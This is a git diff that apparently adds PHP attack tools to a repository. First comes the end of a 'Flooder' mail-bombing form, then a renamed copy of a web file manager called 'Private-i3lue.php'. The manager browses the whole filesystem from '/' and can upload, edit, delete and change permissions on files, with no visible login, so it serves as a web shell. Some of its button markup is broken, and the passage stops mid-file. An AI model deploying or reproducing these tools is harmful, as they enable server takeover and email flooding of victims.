+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td valign=top colspan=3 height=30>
+<b>.::Flooder::.</b>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>log_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='log' class='ta' size=17 value="mflood_log.txt">
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Send to:</font>
+</td><td width=65% align=right>
+<input type=text name='to' class='ta' size=27>
+</td></tr><tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>From:</font>
+</td><td width=65% align=right>
+<input type=text name='from' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Subject:</font>
+</td><td width=65% align=right>
+<input type=text name='subject' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Message:</font>
+</td><td width=65% align=right>
+<textarea name='msg' class='ta' cols=20 rows=4></textarea>
+</td></tr>
+<td height=25><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Amount:</font>
+</td><td width=65% align=right>
+<input type=text name='amount' class='ta' size=17>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Check<sup>*</sup>:</font>
+</td><td width=65% align=right>
+<input type=text name='check' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+</td><td width=65% align=right>
+<input type=submit class='bt' value="Flood">
+<input type=hidden name='type' value=10>
+</td></tr>
+</table></form>
+</td></tr>
+</table>
+</td></tr>
+</table>
+</td></tr>
+</table></center>
+<center><font size=1 color=#444444>.:[Public v1.0]:.</font></center>
+</body>
+</html>
+	
+<!-- Coded by LoFFi & Ls01r //-->
\ No newline at end of file
diff --git a/php/Private-i3lue.php b/php/Private-i3lue.php
new file mode 100644
index 0000000..93abbae
--- /dev/null
+++ b/php/Private-i3lue.php
@@ -0,0 +1,1456 @@
+<?php
+/*
+ * webadmin.php - a simple Web-based file manager
+ * Copyright (C) 2002  Daniel Wacker <mail@wacker-welt.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Select your language:
+ * 'en' - English
+ * 'de' - German
+ * 'cz' - Czech
+ * 'it' - Italian
+ */
+$language = 'en';
+
+/* This directory is shown when you start webadmin.php.
+ * For example: './' would be the current directory.
+ */
+$homedir = './';
+
+/* This sets the root directory of the treeview.
+ * Set it to '/' to see the whole filesystem.
+ */
+$treeroot = '/';
+
+/* When you create a directory, its permission is set to this octal value.
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+$dirpermission = 0705;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you create a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $newfilepermission = 0666;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you upload a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $uploadedfilepermission = 0666;
+
+/* The size of the file edit textarea
+ */
+$editrows = 20;
+$editcols = 70;
+
+/* ------------------------------------------------------------------------- */
+
+$self = htmlentities(basename($_SERVER['PHP_SELF']));
+$homedir = relpathtoabspath($homedir, getcwd());
+$treeroot = relpathtoabspath($treeroot, getcwd());
+$words = getwords($language);
+
+/* If PHP added any slashes, strip them */
+if (ini_get('magic_quotes_gpc')) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+/* Return Images */
+if (isset($_GET['imageid'])) {
+	header('Content-Type: image/gif');
+	echo(getimage($_GET['imageid']));
+	exit;
+}
+
+/* Initialize session */
+ini_set('session.use_cookies', FALSE);
+ini_set('session.use_trans_sid', FALSE);
+session_name('id');
+session_start();
+
+/* Initialize dirlisting output */
+$error = $notice = '';
+$updatetreeview = FALSE;
+
+/* Handle treeview requests */
+if (isset($_REQUEST['action'])) {
+	switch ($_REQUEST['action']) {
+	case 'treeon':
+		$_SESSION['tree'] = array();
+		$_SESSION['hassubdirs'][$treeroot] = tree_hassubdirs($treeroot);
+		tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot);
+		frameset();
+		exit;
+	case 'treeoff':
+		$_SESSION['tree'] = NULL;
+		$_SESSION['hassubdirs'] = NULL;
+		dirlisting();
+		exit;
+	}
+}
+
+/* Set current directory */
+if (!isset($_SESSION['dir'])) {
+	$_SESSION['dir'] = $homedir;
+	$updatetreeview = TRUE;
+}
+if (!empty($_REQUEST['dir'])) {
+	$newdir = relpathtoabspath($_REQUEST['dir'], $_SESSION['dir']);
+	/* If the requested directory is a file, show the file */
+	if (@is_file($newdir) && @is_readable($newdir)) {
+		/* if (@is_writable($newdir)) {
+			$_REQUEST['edit'] = $newdir;
+		} else */ if (is_script($newdir)) {
+			$_GET['showh'] = $newdir;
+		} else {
+			$_GET['show'] = $newdir;
+		}
+	} elseif ($_SESSION['dir'] != $newdir) {
+		$_SESSION['dir'] = $newdir;
+		$updatetreeview = TRUE;
+	}
+}
+
+/* Show a file */
+if (!empty($_GET['show'])) {
+	$show = relpathtoabspath($_GET['show'], $_SESSION['dir']);
+	if (!show($show)) {
+		$error= buildphrase('&quot;<b>' . htmlentities($show) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Show a file syntax highlighted */
+if (!empty($_GET['showh'])) {
+	$showh = relpathtoabspath($_GET['showh'], $_SESSION['dir']);
+	if (!show_highlight($showh)) {
+		$error = buildphrase('&quot;<b>' . htmlentities($showh) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Upload file */
+if (isset($_FILES['upload'])) {
+	$file = relpathtoabspath($_FILES['upload']['name'], $_SESSION['dir']);
+	if (@is_writable($_SESSION['dir']) && @move_uploaded_file($_FILES['upload']['tmp_name'], $file) && (!isset($uploadedfilepermission) || chmod($file, $uploadedfilepermission))) {
+		$notice = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['uploaded']);
+	} else {
+		$error = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['notuploaded']);
+	}
+}
+
+/* Create file */
+if (!empty($_GET['create']) && $_GET['type'] == 'file') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (substr($file, strlen($file) - 1, 1) == '/') $file = substr($file, 0, strlen($file) - 1);
+	if (is_free($file) && touch($file) && ((!isset($newfilepermission)) || chmod($file, $newfilepermission))) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$_REQUEST['edit'] = $file;
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Create directory */
+if (!empty($_GET['create']) && $_GET['type'] == 'dir') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (is_free($file) && @mkdir($file, $dirpermission)) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$updatetreeview = TRUE;
+		if (!empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = TRUE;
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file);
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Ask symlink target */
+if (!empty($_GET['symlinktarget']) && empty($_GET['symlink'])) {
+	$symlinktarget = relpathtoabspath($_GET['symlinktarget'], $_SESSION['dir']);
+	html_header($words['createsymlink']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="symlinktarget" value="<?php echo(htmlentities($_GET['symlinktarget'])); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td valign="top"><?php echo($words['target']); ?>:&nbsp;</td>
+				<td>
+					<b><?php echo(htmlentities($_GET['symlinktarget'])); ?></b><br>
+					<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked>
+					<label for="checkbox_relative"><?php echo($words['reltarget']); ?></label>
+				</td>
+			</tr>
+			<tr>
+				<td><?php echo($words['symlink']); ?>:&nbsp;</td>
+				<td><input type="text" name="symlink" value="<?php echo(htmlentities(spath(dirname($symlinktarget)))); ?>" size="<?php $size = strlen($_GET['symlinktarget']) + 9; if ($size < 30) $size = 30; echo($size);  ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	html_footer();
+	exit;
+}
+
+/* Create symlink */
+if (!empty($_GET['symlink']) && !empty($_GET['symlinktarget'])) {
+	$symlink = relpathtoabspath($_GET['symlink'], $_SESSION['dir']);
+	$target = $_GET['symlinktarget'];
+	if (@is_dir($symlink)) $symlink = spath($symlink) . basename($target);
+	if ($symlink == $target) {
+		$error = buildphrase(array('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', '&quot;<b>' . htmlentities($target) . '</b>&quot;'), $words['samefiles']);
+	} else {
+		if (@$_GET['relative'] == 'yes') {
+			$target = abspathtorelpath(dirname($symlink), $target);
+		} else {
+			$target = $_GET['symlinktarget'];
+		}
+		if (is_free($symlink) && @symlink($target, $symlink)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['created']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['notcreated']);
+		}
+	}
+}
+
+/* Delete file */
+if (!empty($_GET['delete'])) {
+	$delete = relpathtoabspath($_GET['delete'], $_SESSION['dir']);
+	if (@$_GET['sure'] == 'TRUE') {
+		if (remove($delete)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['deleted']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['notdeleted']);
+		}
+	} else {
+		html_header($words['delete']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['suredelete'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("$self?" . SID . '&delete=' . urlencode($delete) . '&sure=TRUE'); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Change permission */
+if (!empty($_GET['permission'])) {
+	$permission = relpathtoabspath($_GET['permission'], $_SESSION['dir']);
+	if ($p = @fileperms($permission)) {
+		if (!empty($_GET['set'])) {
+			$p = 0; 
+			if (isset($_GET['ur'])) $p |= 0400; if (isset($_GET['uw'])) $p |= 0200; if (isset($_GET['ux'])) $p |= 0100;
+			if (isset($_GET['gr'])) $p |= 0040; if (isset($_GET['gw'])) $p |= 0020; if (isset($_GET['gx'])) $p |= 0010;
+			if (isset($_GET['or'])) $p |= 0004; if (isset($_GET['ow'])) $p |= 0002; if (isset($_GET['ox'])) $p |= 0001;
+			if (@chmod($_GET['permission'], $p)) {
+				$notice = buildphrase(array('&quot<b>' . htmlentities($permission) . '</b>&quot;', '&quot;<b>' . substr(octtostr("0$p"), 1) . '</b>&quot; (<b>' . decoct($p) . '</b>)'), $words['permsset']);
+			} else {
+				$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+			}
+		} else {
+			html_header($words['permission']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table>
+			<tr>
+				<td><?php echo($words['file']); ?>:</td>
+				<td><input type="text" name="permission" value="<?php echo(htmlentities($permission)); ?>" size="<?php echo(textfieldsize($permission)); ?>"></td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			<tr>
+				<td valign="top">
+					<?php echo($words['permission']); ?>:&nbsp;
+					</form><form action="<?php echo($self); ?>" method="get">
+					<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+					<input type="hidden" name="permission" value="<?php echo(htmlentities($permission)); ?>">
+					<input type="hidden" name="set" value="TRUE">
+				</td>
+				<td colspan="2">
+					<table border="0">
+					<tr>
+						<td>&nbsp;</td>
+						<td><?php echo($words['owner']); ?></td>
+						<td><?php echo($words['group']); ?></td>
+						<td><?php echo($words['other']); ?></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['read']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ur" value="1"<?php if ($p & 00400) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gr" value="1"<?php if ($p & 00040) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="or" value="1"<?php if ($p & 00004) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['write']); ?>:</td>
+						<td align="center"><input type="checkbox" name="uw" value="1"<?php if ($p & 00200) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gw" value="1"<?php if ($p & 00020) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ow" value="1"<?php if ($p & 00002) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['exec']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ux" value="1"<?php if ($p & 00100) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gx" value="1"<?php if ($p & 00010) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ox" value="1"<?php if ($p & 00001) echo(' checked'); ?>></td>
+					</tr>
+					</table>
+				</td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td colspan="2"><input type="submit" value="<?php echo($words['setperms']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+	}
+}
+
+/* Move file */
+if (!empty($_GET['move'])) {
+	$move = relpathtoabspath($_GET['move'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($move));
+		if (@is_dir($destination)) $destination = spath($destination) . basename($move);
+		if ($move == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @rename($move, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['moved']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notmoved']);
+			}
+		}
+	} else {
+		html_header($words['move']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="move" value="<?php echo(htmlentities($move)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($move)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['moveto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($move)))); ?>" size="<?php echo(textfieldsize($move)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['move']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Copy file */
+if (!empty($_GET['cpy'])) {
+	$copy = relpathtoabspath($_GET['cpy'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($copy));
+          if (@is_dir($destination)) $destination = spath($destination) . basename($copy);
+		if ($copy == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @copy($copy, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['copied']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notcopied']);
+			}
+		}
+	} else {
+		html_header($words['copy']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="cpy" value="<?php echo(htmlentities($copy)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($copy)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['copyto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($copy)))); ?>" size="<?php echo(textfieldsize($copy)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['copy']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Save edited file */
+if (!empty($_POST['edit']) && isset($_POST['save'])) {
+	$edit = relpathtoabspath($_POST['edit'], $_SESSION['dir']);
+	if ($f = @fopen($edit, 'w')) {
+		/* write file without carriage returns */
+		fwrite($f, str_replace("\r\n", "\n", $_POST['content']));
+		fclose($f);
+		$notice = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['saved']);
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['notsaved']);
+	}
+}
+
+/* Edit file */
+if (isset($_REQUEST['edit']) && !isset($_POST['save'])) {
+	$file = relpathtoabspath($_REQUEST['edit'], $_SESSION['dir']);
+	if (@is_dir($file)) {
+		/* If the requested file is a directory, show the directory */
+		$_SESSION['dir'] = $file;
+		$updatetreeview = TRUE;
+	} else {
+		if ($f = @fopen($file, 'r')) {
+			html_header($words['edit']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><input type="text" name="edit" value="<?php echo(htmlentities($file)); ?>" size="<?php echo(textfieldsize($file)); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+	<form action="<?php echo($self); ?>" method="post" name="f">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="edit" value="<?php echo(htmlentities($file)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEFF" align="center"><textarea name="content" rows="<?php echo($editrows); ?>" cols="<?php echo($editcols); ?>" wrap="off" style="background: #EEEEFF; border: none;"><?php
+			if (isset($_POST['content'])) {
+				echo(htmlentities($_POST['content']));
+				if (isset($_POST['add']) && !empty($_POST['username']) && !empty($_POST['password'])) {
+					echo("\n" . htmlentities($_POST['username'] . ':' . crypt($_POST['password'])));
+				}
+			} else {
+				echo(htmlentities(fread($f, filesize($file))));
+			}
+			fclose($f);
+?></textarea></td>
+	</tr>
+<?php if (basename($file) == '.htpasswd') { /* specials with .htpasswd */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['username']); ?>:&nbsp;</td>
+				<td><input type="text" name="username" size="15">&nbsp;</td>
+				<td><?php echo($words['password']); ?>:&nbsp;</td>
+				<td><input type="password" name="password" size="15">&nbsp;</td>
+				<td><input type="submit" name="add" value="<?php echo($words['add']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+<?php } if (basename($file) == '.htaccess') { /* specials with .htaccess */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><input type="button" value="<?php echo($words['addauth']); ?>" 
+	</tr>
+<?php } ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<input type="button" value="<?php echo($words['reset']); ?>" 
+			<input type="button" value="<?php echo($words['clear']); ?>" '')">
+			<input type="submit" name="save" value="<?php echo($words['save']); ?>">
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot; ', $words['notopened']);
+		}
+	}
+}
+
+/* Show directory listing (and treeview) */
+if (!empty($_SESSION['tree'])) {
+	if (isset($_REQUEST['frame']) && $_REQUEST['frame'] == 'treeview') {
+		treeview();
+	} else {
+		if (isset($_GET['noupdate'])) $updatetreeview = FALSE;
+		dirlisting(TRUE);
+	}
+} else {
+	dirlisting();
+}
+
+/* ------------------------------------------------------------------------- */
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+function relpathtoabspath ($file, $dir) {
+	$dir = spath($dir);
+	if (substr($file, 0, 1) != '/') $file = $dir . $file;
+	if (!@is_link($file) && ($r = realpath($file)) != FALSE) $file = $r;
+	if (@is_dir($file) && !@is_link($file)) $file = spath($file);
+	return $file;
+}
+
+function abspathtorelpath ($pos, $target) {
+	$pos = spath($pos);
+	$path = '';
+	while ($pos != $target) {
+		if ($pos == substr($target, 0, strlen($pos))) {
+			$path .= substr($target, strlen($pos));
+			break;
+		} else {
+			$path .= '../';
+			$pos = strrev(strstr(strrev(substr($pos, 0, strlen($pos) - 1)), '/'));
+		}
+	}
+	return $path;
+}
+
+function is_script ($file) {
+	return ereg('.php[3-4]?$', $file);
+}
+
+function spath ($path) {
+	if (substr($path, strlen($path) - 1, 1) != '/') $path .= '/';
+	return $path;
+}
+
+function textfieldsize ($str) {
+	$size = strlen($str) + 5;
+	if ($size < 30) $size = 30;
+	return $size;
+}
+
+function is_free ($file) {
+	global $words;
+	if (@file_exists($file) && empty($_GET['overwrite'])) {
+		html_header($words['alreadyexists']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['overwrite'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("{$_SERVER['REQUEST_URI']}&overwrite=yes"); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+	if (!empty($_GET['overwrite'])) {
+		return remove($file);
+	}
+	return TRUE;
+}
+
+function remove ($file) {
+	global $updatetreeview;
+	if (@is_dir($file) && !@is_link($file)) {
+		$error = FALSE;
+		if ($p = @opendir($file = spath($file))) {
+			while (($f = readdir($p)) !== FALSE)
+				if ($f != '.' && $f != '..' && !remove($file . $f))
+					$error = TRUE;
+		}
+		if ($error) $x = FALSE; else $x = @rmdir($file);
+		$updatetreeview = TRUE;
+		if ($x && !empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = tree_hassubdirs($file);
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file, TRUE);
+		}
+	} else {
+		$x = @unlink($file);
+	}
+	return $x;
+}
+
+function getwords ($language) {
+	switch ($language) {
+	case 'de':
+		$words['dir'] = 'Verzeichnis'; $words['file'] = 'Datei';
+		$words['filename'] = 'Dateiname'; $words['size'] = 'Gr&ouml;&szlig;e'; $words['permission'] = 'Rechte'; $words['functions'] = 'Funktionen';
+		$words['owner'] = 'Eigner'; $words['group'] = 'Gruppe'; $words['other'] = 'Andere';
+		$words['create'] = 'erstellen'; $words['copy'] = 'kopieren'; $words['copyto'] = 'kopieren nach'; $words['move'] = 'verschieben'; $words['moveto'] = 'verschieben nach'; $words['delete'] = 'l&ouml;schen'; $words['edit'] = 'editieren';
+		$words['read'] = 'lesen'; $words['write'] = 'schreiben'; $words['exec'] = 'ausf&uuml;hren'; $words['change'] = 'wechseln'; $words['upload'] = 'hochladen'; $words['configure'] = 'konfigurieren';
+		$words['yes'] = 'ja'; $words['no'] = 'nein';
+		$words['back'] = 'zur&uuml;ck'; $words['setperms'] = 'Rechte setzen';
+		$words['readingerror'] = 'Fehler beim Lesen von 1';
+		$words['permsset'] = 'Die Rechte von 1 wurden auf 2 gesetzt.'; $words['permsnotset'] = 'Die Rechte von 1 konnten nicht gesetzt werden.';
+		$words['uploaded'] = '1 wurde nach 2 hochgeladen.'; $words['notuploaded'] = '1 konnte nicht nach 2 hochgeladen werden.';
+		$words['moved'] = '1 wurde nach 2 verschoben.'; $words['notmoved'] = '1 konnte nicht nach 2 verschoben werden.';
+		$words['copied'] = '1 wurde nach 2 kopiert.'; $words['notcopied'] = '1 konnte nicht nach 2 kopiert werden.';
+		$words['created'] = '1 wurde erstellt.'; $words['notcreated'] = '1 konnte nicht erstellt werden.';
